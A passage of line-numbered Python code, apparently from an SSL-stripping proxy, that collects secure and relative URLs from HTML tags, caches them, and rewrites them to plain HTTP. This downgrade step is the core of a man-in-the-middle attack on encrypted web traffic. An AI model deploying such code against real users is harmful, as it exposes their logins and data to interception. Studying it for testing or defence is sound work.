tag.attrs.items(): 60 | if isinstance(attr_value, list): 61 | attr_value = ' '.join(attr_value) 62 | 63 | if regex.SECURE_URL.fullmatch(attr_value): 64 | url_attrs.append(attr_name) 65 | self.cache.add_url(attr_value) 66 | found = True 67 | elif regex.RELATIVE_URL.fullmatch(attr_value): 68 | url_attrs.append(attr_name) 69 | self.cache.add_url(attr_value, host=self.host) 70 | found = True 71 | 72 | if url_attrs: 73 | secure_url_attrs.append(url_attrs) 74 | 75 | return found 76 | 77 | secure_tags = soup.find_all(has_secure_url_attr) 78 | 79 | for i, tag in enumerate(secure_tags): 80 | for attr in secure_url_attrs[i]: 81 | secure_url = tag[attr] 82 | if secure_url.startswith('/'): 83 | tag[attr] = 'http://{}{}'.format(self.host, secure_url) 84 | else: 85 | parsed_url = urllib.parse.urlsplit(secure_url) 86 | tag[attr] = urllib.parse.urlunsplit(parsed_url._replace(scheme='http')) 87 | 88 | # strip secure URLs from